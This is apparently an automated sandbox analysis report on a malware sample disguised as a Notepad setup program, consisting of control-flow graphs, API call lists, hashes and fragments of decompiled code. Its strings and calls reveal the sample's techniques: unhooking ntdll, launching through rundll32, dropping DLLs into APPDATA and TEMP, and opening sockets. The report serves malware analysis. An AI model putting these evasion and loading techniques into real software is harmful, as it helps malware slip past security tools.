                                      control_flow_graph 610 4076f0-407703 611 407705 610->611 612 407718-407775 GetCommandLineA strlen call 408390 610->612 613 40770a-407711 611->613 614 407705 call 401290 611->614 617 40777b-407797 612->617 618 40785f-407884 __p__pgmptr 612->618 614->613 619 407798-40779b 617->619 618->613 620 40788a-4078b3 GetModuleFileNameA 618->620 621 4077a1-4077a4 619->621 622 407a88-407a8b 619->622 620->613 623 4078b9-4078ca __p__pgmptr _strdup 620->623 624 407990-407996 621->624 625 4077aa-4077af 621->625 622->625 626 407a91-407a97 622->626 623->613 624->625 630 40799c-40799f 624->630 627 407b25 625->627 628 4077b5 625->628 626->625 629 407a9d-407aa0 626->629 643 407b2c 627->643 631 4077b8-4077c1 628->631 629->625 632 407d70-407d80 629->632 633 4079a6 629->633 634 407aa7-407aae 629->634 635 407ab8-407ac2 629->635 630->625 630->632 630->633 630->634 630->635 636 4079f0-4079f7 630->636 637 407a44-407a48 630->637 631->631 646 4077c3-4077cb 631->646 644 407d82 632->644 645 407d8c-407d8f 632->645 641 4079a9-4079c0 633->641 638 407b00-407b06 634->638 639 407ab0-407ab3 634->639 640 407ac8-407acf 635->640 635->641 636->625 642 4079fd-407a01 636->642 647 407b33-407b35 637->647 648 407a4e 637->648 650 4078ff-407914 638->650 639->650 649 4079c6-4079ca 640->649 651 407ad5-407ad7 640->651 641->643 641->649 652 407a07-407a09 642->652 653 407b3a 642->653 643->647 644->645 654 407d91-407d94 645->654 655 407da8-407db9 645->655 657 4077d1-4077d9 646->657 658 4078f8-4078fd 646->658 656 407a5b-407a62 647->656 659 407a50-407a59 648->659 660 4079d0-4079d9 649->660 650->619 667 40791a-40791c 650->667 661 4079e5-4079eb 651->661 662 407a10-407a19 652->662 653->632 663 407d96-407da0 654->663 664 407de8-407e0e call 407fa0 654->664 655->663 668 407dbb-407dbd 655->668 669 407ae0-407af2 656->669 670 407a64-407a67 656->670 665 4078d0-4078e2 _isctype 657->665 666 4077df-4077ea 657->666 658->650 659->656 659->659 660->660 673 4079db-4079df 660->673 661->658 662->662 674 
407a1b-407a22 662->674 676 4077f0-4077f6 665->676 677 4078e8-4078eb 665->677 666->676 666->677 678 407922-407924 667->678 679 40781d-40781f 667->679 671 407dc0-407dc9 668->671 669->650 670->669 672 407a69-407a7e 670->672 680 407dcb 671->680 681 407dcd-407dd2 671->681 672->650 673->658 673->661 682 407a24-407a27 674->682 683 407a2d-407a3f 674->683 687 407940-407984 call 409630 676->687 688 4077fc-407804 676->688 677->676 686 4078f1 677->686 689 407928-407931 678->689 685 407820-407826 679->685 680->681 681->671 691 407dd4-407dde 681->691 682->683 694 407b0b-407b20 682->694 683->650 692 407832-40785a call 409630 685->692 693 407828-407830 685->693 686->658 687->650 688->687 695 40780a-407818 688->695 689->689 696 407933 689->696 692->618 693->618 693->692 694->650 695->650 695->685 696->685
                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 00407718
                                      • strlen.MSVCRT ref: 00407728
                                      • __p__pgmptr.MSVCRT ref: 0040787B
                                        • Part of subcall function 00401290: __getmainargs.MSVCRT ref: 004012C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: CommandLine__getmainargs__p__pgmptrstrlen
                                      • String ID: !$'$?$@$Z
                                      • API String ID: 3494280972-2658495842
                                      • Opcode ID: ea87d48da4ad286b4472607b9024f34d9ebd5fc97a738b2df8af4cdc5382a03f
                                      • Instruction ID: 48b51223d96d600507549aaa95ac442aa908dc6802bf7441eca1741a7d545c84
                                      • Opcode Fuzzy Hash: ea87d48da4ad286b4472607b9024f34d9ebd5fc97a738b2df8af4cdc5382a03f
                                      • Instruction Fuzzy Hash: D9C1B271E083158BDB24DF28C88439AB7E1AF85304F4484BED949A7381D739BA85CF5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 781 6e86cb-6e86f9 GetCurrentProcess call 6e8d61 call 6e8da7 786 6e86ff-6e8722 GetModuleHandleA call 6e88f5 781->786 787 6e88f0-6e88f4 781->787 786->787 790 6e8728-6e873e call 6e8ad7 786->790 793 6e87ba-6e87c2 790->793 794 6e8740-6e874f 790->794 795 6e88ad-6e88b2 793->795 796 6e87c8-6e87cc 793->796 794->793 797 6e8751-6e8756 794->797 795->787 798 6e88b4-6e88c8 GetPEB 795->798 796->787 799 6e87d2-6e87dd 796->799 800 6e875d-6e8761 797->800 801 6e8758-6e875b 797->801 798->787 802 6e88ca-6e88cd 798->802 799->795 803 6e87e3-6e87fe GetCurrentProcess 799->803 805 6e87a2-6e87b7 memcpy 800->805 806 6e8763-6e8766 800->806 801->800 804 6e8768-6e8777 call 6e0517 801->804 807 6e88d0-6e88d2 802->807 803->795 808 6e8804 803->808 816 6e8779-6e877c 804->816 817 6e8795-6e879e 804->817 805->793 806->804 806->805 807->787 810 6e88d4-6e88d6 807->810 811 6e8807-6e8823 call 6e8ebf 808->811 813 6e88d8-6e88de call 6e8f22 810->813 814 6e88e5-6e88ee 810->814 823 6e889a-6e88a7 811->823 824 6e8825-6e8831 IsBadHugeReadPtr 811->824 822 6e88e3-6e88e4 813->822 814->807 816->817 821 6e877e-6e8787 816->821 817->797 818 6e87a0 817->818 818->793 821->793 825 6e8789-6e8790 821->825 822->814 823->795 823->811 824->823 826 6e8833-6e883f IsBadHugeReadPtr 824->826 825->793 827 6e8792 825->827 826->823 828 6e8841-6e8850 memcmp 826->828 827->817 828->823 829 6e8852-6e8874 call 6e0300 828->829 829->823 832 6e8876-6e8895 memcpy call 6e0300 829->832 832->823
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 006E86D9
                                        • Part of subcall function 006E8D61: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006E86E5,00000000), ref: 006E8D77
                                        • Part of subcall function 006E8D61: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E8D83
                                        • Part of subcall function 006E8DA7: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
                                        • Part of subcall function 006E8DA7: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
                                        • Part of subcall function 006E8DA7: GetFileSize.KERNEL32(00000000,00000000), ref: 006E8DFE
                                        • Part of subcall function 006E8DA7: malloc.MSVCRT ref: 006E8E08
                                        • Part of subcall function 006E8DA7: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
                                        • Part of subcall function 006E8DA7: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(00000000,00000000,00000000), ref: 006E8E69
                                        • Part of subcall function 006E8DA7: memcpy.NTDLL(?,?,?), ref: 006E8E8F
                                        • Part of subcall function 006E8DA7: ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
                                        • Part of subcall function 006E8DA7: FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 006E8704
                                      • memcpy.NTDLL(Function_00000300,00000000,?), ref: 006E87B2
                                      • GetCurrentProcess.KERNEL32 ref: 006E87E3
                                      • IsBadHugeReadPtr.KERNEL32(00000000,?), ref: 006E8829
                                      • IsBadHugeReadPtr.KERNEL32(?,?), ref: 006E8837
                                      • memcmp.NTDLL ref: 006E8846
                                      • memcpy.NTDLL(?,00000000,?,?,?,00001000,00000040,?), ref: 006E887B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$FileRead$CurrentHandleHugeModuleProcess$??3@AddressAllocChangeCloseCreateEnvironmentExpandFindNotificationProcSizeStringsVirtualmallocmemcmp
                                      • String ID: %Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$ntdll.dll
                                      • API String ID: 1594796074-4023328602
                                      • Opcode ID: 41a432c0b3cb950c789aa3dbd7e142e7d614742475ef3fe9414d3eaf4f0bb0d9
                                      • Instruction ID: 4859297827db80d689de082dc9f639f91e6e4c9a7dfbbca8608a5f7095a4d51a
                                      • Opcode Fuzzy Hash: 41a432c0b3cb950c789aa3dbd7e142e7d614742475ef3fe9414d3eaf4f0bb0d9
                                      • Instruction Fuzzy Hash: 5C618D71D02389AFDF219F96C884AEEB7BBEF44314F644069E909A3241DB359D41CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 869 6f0927-6f0952 memset 870 6f0976-6f097e 869->870 871 6f0954-6f0974 869->871 872 6f0985-6f0996 memset 870->872 871->872 873 6f0998-6f099d 872->873 874 6f09a0-6f09c0 WSARecv 872->874 873->874 876 6f09e2-6f09ed GetLastError 874->876 877 6f09c2-6f09ca 874->877 879 6f0a23-6f0a32 876->879 880 6f09ef-6f09f7 WSAGetLastError 876->880 878 6f09cc-6f09dd 877->878 877->879 881 6f0a73-6f0a7d call 6f2144 878->881 884 6f0a7e-6f0a82 879->884 885 6f0a34-6f0a3b 879->885 882 6f09f9-6f09ff WSAGetLastError 880->882 883 6f0a01-6f0a0c WSAGetLastError 880->883 881->884 887 6f0a11-6f0a21 call 6f2144 882->887 883->887 885->884 888 6f0a3d-6f0a53 RegisterWaitForSingleObject 885->888 887->884 888->884 889 6f0a55-6f0a5f GetLastError 888->889 892 6f0a65-6f0a6c GetLastError 889->892 893 6f0a61-6f0a63 GetLastError 889->893 895 6f0a71 892->895 893->895 895->881
                                      APIs
                                      • memset.NTDLL ref: 006F093E
                                      • memset.NTDLL ref: 006F098A
                                      • WSARecv.WS2_32(?,00000000,00000001,?,00000000,00000044,00000000), ref: 006F09B8
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F09E2
                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 006F09EF
                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 006F09F9
                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 006F0A01
                                      • RegisterWaitForSingleObject.KERNEL32(00000064,?,006F0870,00000034,000000FF,00000004), ref: 006F0A4B
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F0A5B
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F0A61
                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 006F0A65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
                                      • String ID:
                                      • API String ID: 2020750497-0
                                      • Opcode ID: 8806394e5b00fcfce100f8ab7a2287f92dfbe9785bf82ea21d07b266e2341286
                                      • Instruction ID: 7fbe5dd8cf46fa38ff7ee723c24e78e934015a9762b4bfe67890407da14cf7df
                                      • Opcode Fuzzy Hash: 8806394e5b00fcfce100f8ab7a2287f92dfbe9785bf82ea21d07b266e2341286
                                      • Instruction Fuzzy Hash: 7E418D31500B0AAFE721DF64CC45BBABBFAFF04314F104629EA91D65A2D374E905CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 60%
                                      			E004011A0() {
                                      				intOrPtr _v12;
                                      				int _v16;
                                      				int _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr* _t11;
                                      				intOrPtr _t14;
                                      				int _t17;
                                      				intOrPtr* _t23;
                                      				intOrPtr _t28;
                                      				void* _t30;
                                      				int _t31;
                                      				void* _t32;
                                      				void* _t33;
                                      				intOrPtr* _t34;
                                      				signed int _t35;
                                      
                                      				_t34 =  &_v24;
                                      				_t11 =  *0x425324; // 0x407d70
                                      				if(_t11 != 0) {
                                      					_v20 = 0;
                                      					_v24 = 2;
                                      					 *_t34 = 0;
                                      					 *_t11();
                                      					_t34 = _t34 - 0xc;
                                      				}
                                      				 *_t34 = E00401000; // executed
                                      				SetUnhandledExceptionFilter(??); // executed
                                      				_t35 = _t34 - 4;
                                      				E00407B50(_t30);
                                      				_t14 =  *0x424fc4; // 0xfffffffd
                                      				 *_t35 = _t14;
                                      				E004084B0(); // executed
                                      				E004076F0(_t32); // executed
                                      				_t17 =  *0x427008;
                                      				if(_t17 != 0) {
                                      					L4:
                                      					_t28 = __imp___iob; // 0x74894600
                                      					_v16 = _t17;
                                      					 *0x424fc8 = _t17;
                                      					_v20 =  *((intOrPtr*)(_t28 + 0x10));
                                      					L0040A368();
                                      					_v16 =  *0x427008;
                                      					_v20 =  *((intOrPtr*)(_t28 + 0x30));
                                      					L0040A368();
                                      					_v16 =  *0x427008;
                                      					_t17 =  *(_t28 + 0x50);
                                      					_v20 = _t17;
                                      					L0040A368();
                                      					goto L3;
                                      				} else {
                                      					L3:
                                      					L0040A3A8();
                                      					_t31 =  *0x424fc8; // 0x4000
                                      					 *_t17 = _t31;
                                      					E004081A0(_t28, _t32, _t33);
                                      					_t35 = _t35 & 0xfffffff0;
                                      					_t23 = E00407D00();
                                      					L0040A3B0();
                                      					_v12 =  *_t23;
                                      					_v16 =  *0x427000;
                                      					_v20 =  *0x427004; // executed
                                      					_t17 = E00402E0B(); // executed
                                      					L0040A390();
                                      					ExitProcess(_t17);
                                      					goto L4;
                                      				}
                                      			}

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
                                      • String ID: p}@
                                      • API String ID: 3476844589-1207826281
                                      • Opcode ID: a45e277e0ddd29b82a1313aa6a6827d61585393c4881971a0e39252b5f68e253
                                      • Instruction ID: 330f25d58611b2836ae3ca3aaec3816092505130626428a98ad199a3f004d377
                                      • Opcode Fuzzy Hash: a45e277e0ddd29b82a1313aa6a6827d61585393c4881971a0e39252b5f68e253
                                      • Instruction Fuzzy Hash: A621C9B46087008FC710FF79D58661D77E0BF48718F41493EE884AB392DA3898558B5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,006EC8CA,\GLOBAL??,006EC8D7,00000000), ref: 006E93FF
                                      • NtOpenDirectoryObject.NTDLL(?,00000001,00000018), ref: 006E9436
                                      • calloc.MSVCRT ref: 006E9450
                                      • NtQueryDirectoryObject.NTDLL(?,00000000,00000800,00000001,00000000,00000000,00000000), ref: 006E9467
                                      • calloc.MSVCRT ref: 006E947D
                                      • memcpy.NTDLL(00000000,?), ref: 006E948C
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E94AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DirectoryObjectcalloc$??3@OpenQuerylstrlenmemcpy
                                      • String ID: @
                                      • API String ID: 3201054100-2766056989
                                      • Opcode ID: e95a97761319b7f9ffed67a0b4a0ef29a9980e68666d35634b0ad03ff066f1f5
                                      • Instruction ID: 8ab68101f57a8c0c6ed165db35b54d54b223935be00cebb6f1f7145f0bc095ef
                                      • Opcode Fuzzy Hash: e95a97761319b7f9ffed67a0b4a0ef29a9980e68666d35634b0ad03ff066f1f5
                                      • Instruction Fuzzy Hash: D2312CB5C01219EBDB119FAADC44AEEBBF9FF08711F10811AF514E2290E7748A41CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errno$ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 2068755524-0
                                      • Opcode ID: 3369b53b6a83d211fb5db5ad59101cbdb64616664d88732dffadc5f787f90dbd
                                      • Instruction ID: 10495f1505d1f9a887e1aaac460795732aae97bab1225411faa4919bf34875ea
                                      • Opcode Fuzzy Hash: 3369b53b6a83d211fb5db5ad59101cbdb64616664d88732dffadc5f787f90dbd
                                      • Instruction Fuzzy Hash: E621C9705083508AEB11AF75988126AB7E0AF42318F48847BEC54AF3D3D23C8C45D77B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • socket.WS2_32(00000010,00000001,00000000), ref: 006F0457
                                      • WSAGetLastError.WS2_32(?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F0464
                                        • Part of subcall function 006F04ED: ioctlsocket.WS2_32(006F16C7,8004667E,006F1744), ref: 006F0508
                                        • Part of subcall function 006F04ED: WSAGetLastError.WS2_32(?,?,006F04B2,17E80870,006F16C7,00000000,00000010,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010), ref: 006F0513
                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F047F
                                      • GetLastError.KERNEL32(?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F0489
                                      • closesocket.WS2_32(00000000), ref: 006F049B
                                      • bind.WS2_32(50A5A5A5,006F16C7,00000002), ref: 006F04C2
                                      • WSAGetLastError.WS2_32(?,?,?,006F043E,006F16C7,00000002,006F16C7,00000010,006F16C7,006F1744), ref: 006F04CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
                                      • String ID:
                                      • API String ID: 2417539845-0
                                      • Opcode ID: 8ecc149f90778662164361e6c9b416a8e501cbb388ac49197ab5d80a6899b70c
                                      • Instruction ID: acbf74e5c9fded0e20bce3e4dfc5a789f2bb306d116439e6377081da897a99ea
                                      • Opcode Fuzzy Hash: 8ecc149f90778662164361e6c9b416a8e501cbb388ac49197ab5d80a6899b70c
                                      • Instruction Fuzzy Hash: E1119D31104A0AEBEB211F75EC09BBA7BA7AF42731F108629FB66841F1DB319811DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 006E5F21
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 006E5F2D
                                      • GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?), ref: 006E5F45
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E5F4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: ZwQueryInformationProcess$ntdll.dll
                                      • API String ID: 2292878059-132032222
                                      • Opcode ID: 43bf67666af5feb5001cd1859887bdff0e68ac932085d87fc730018010ceec9f
                                      • Instruction ID: 08b555fd3255f8ee2c0215a0cf04f4fbf636ad5c97a4a77fa8e720bf5aaf044c
                                      • Opcode Fuzzy Hash: 43bf67666af5feb5001cd1859887bdff0e68ac932085d87fc730018010ceec9f
                                      • Instruction Fuzzy Hash: 53F09072952759BBD7109B91CC0AFEEB77E9B04709F000005FA02A2280C6749A40CEA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrInitializeThunk.NTDLL(006E9043,?,?,00001000,00000040,00000000), ref: 006E030A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 386589ac558fb0256981670f6991e750c65251fba2176266621c431f93f0b06c
                                      • Instruction ID: a9014f36a0bb7a2f37bdbf87fac2d9bbc5c011efe5c846a6c97edb4d19d120db
                                      • Opcode Fuzzy Hash: 386589ac558fb0256981670f6991e750c65251fba2176266621c431f93f0b06c
                                      • Instruction Fuzzy Hash: B39002B124140412D1006559882470B010657E0356F66C011A2154665DCA65886675F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • calloc.MSVCRT ref: 006E2BA5
                                        • Part of subcall function 006E359D: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,006E2BCD), ref: 006E35B3
                                        • Part of subcall function 006E359D: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E35BF
                                        • Part of subcall function 006E359D: GetCurrentProcess.KERNEL32(00000000,00000000,?,006E2BCD), ref: 006E35D2
                                        • Part of subcall function 006E359D: IsWow64Process.KERNEL32(00000000,?,006E2BCD), ref: 006E35D9
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006E2C23
                                      • memcpy.NTDLL(00000000,00000000,?), ref: 006E2C3D
                                      • memcpy.NTDLL(?,?,?), ref: 006E2C60
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2C83
                                      • memset.NTDLL ref: 006E2CF3
                                      • time.MSVCRT ref: 006E2D1C
                                      • srand.MSVCRT ref: 006E2D23
                                      • calloc.MSVCRT ref: 006E2D2D
                                      • strlen.NTDLL ref: 006E2D50
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2DF1
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2E18
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 006E2E38
                                      • memset.NTDLL ref: 006E2E56
                                      • lstrcmpiW.KERNELBASE(?,SYSTEM), ref: 006E2E83
                                      • CloseHandle.KERNEL32(?), ref: 006E2E97
                                      • calloc.MSVCRT ref: 006E2EC9
                                      • memcpy.NTDLL(?,?,00000010), ref: 006E2F22
                                      • memcpy.NTDLL(?,006F2E24,00000040,?,?,00000010), ref: 006E2F35
                                      • memcpy.NTDLL(00000004,?,00000080,?,006F2E24,00000040,?,?,00000010), ref: 006E2F47
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E2F8D
                                      • strlen.NTDLL ref: 006E2F57
                                        • Part of subcall function 006E2975: strlen.NTDLL ref: 006E299D
                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 006E2E31
                                        • Part of subcall function 006E403A: malloc.MSVCRT ref: 006E4054
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E3591
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@memcpy$Process$callocstrlen$CurrentHandlememset$AddressAllocCloseModuleOpenProcTokenVirtualWow64lstrcmpimallocsrandtime
                                      • String ID: "%s",PrintUIEntry $%%APPDATA%%\nsis_uns%04x.dll$%%TEMP%%\nsis_uns%04x.dll$%Systemroot%\system32\rundll32.exe$8$GetProcessHeap$HeapAlloc$HeapFree$MapViewOfFile$OpenFileMappingW$SYSTEM$UnmapViewOfFile$VirtualAlloc$VirtualFree$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$dfdll.dll$kernel32.dll$prepare.bin$unhook.bin
                                      • API String ID: 2620314011-3193839693
                                      • Opcode ID: 251ce575476dfac41b68a2bfaf95b45a44a30a95e65fc2ee981e474873b2c105
                                      • Instruction ID: 1e570103d299980dd81158d7dffab59d65bb08fcc0cd2e86ca660e5f6749f411
                                      • Opcode Fuzzy Hash: 251ce575476dfac41b68a2bfaf95b45a44a30a95e65fc2ee981e474873b2c105
                                      • Instruction Fuzzy Hash: 60524CB1901359AFDB109FA6DC89AEEBBBAFF08304F104529F545A7391DB709A41CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 30%
                                      			E00408D90(signed int __eax, signed int __ecx, signed int __edx, signed int _a4) {
                                      				void* _v16;
                                      				void _v32;
                                      				signed int _v36;
                                      				char _v44;
                                      				signed int _v48;
                                      				signed int _v52;
                                      				signed int _v56;
                                      				signed int _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				signed int* _v72;
                                      				signed char* _v76;
                                      				int _v80;
                                      				signed int _v84;
                                      				signed int* _v88;
                                      				signed int _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				signed char _v101;
                                      				signed int _v108;
                                      				char _v112;
                                      				intOrPtr _v116;
                                      				int _v120;
                                      				void* _t211;
                                      				signed int _t212;
                                      				signed int* _t213;
                                      				signed int _t221;
                                      				signed int _t223;
                                      				signed int _t230;
                                      				signed int _t232;
                                      				int _t234;
                                      				signed int _t235;
                                      				signed int _t236;
                                      				signed int _t239;
                                      				intOrPtr* _t242;
                                      				signed int _t245;
                                      				void* _t250;
                                      				intOrPtr _t263;
                                      				signed int _t266;
                                      				void* _t273;
                                      				char* _t274;
                                      				signed int _t275;
                                      				intOrPtr _t276;
                                      				void* _t280;
                                      				void* _t281;
                                      				int _t284;
                                      				void* _t285;
                                      				signed int _t288;
                                      				char* _t292;
                                      				signed int _t294;
                                      				signed int _t300;
                                      				signed int* _t309;
                                      				signed int _t310;
                                      				signed int _t311;
                                      				signed int _t314;
                                      				signed int _t315;
                                      				signed int _t316;
                                      				signed int* _t317;
                                      				signed char* _t319;
                                      				signed int* _t320;
                                      				signed int _t321;
                                      				signed int* _t322;
                                      				signed int _t323;
                                      				signed int _t324;
                                      				signed char* _t326;
                                      				intOrPtr _t327;
                                      				signed int _t332;
                                      				signed char* _t334;
                                      				signed int _t335;
                                      				signed char* _t336;
                                      				signed int _t338;
                                      				signed char* _t339;
                                      				signed int* _t340;
                                      				signed char* _t344;
                                      				signed char* _t346;
                                      				signed int _t348;
                                      				signed int _t349;
                                      				signed int _t352;
                                      				char* _t354;
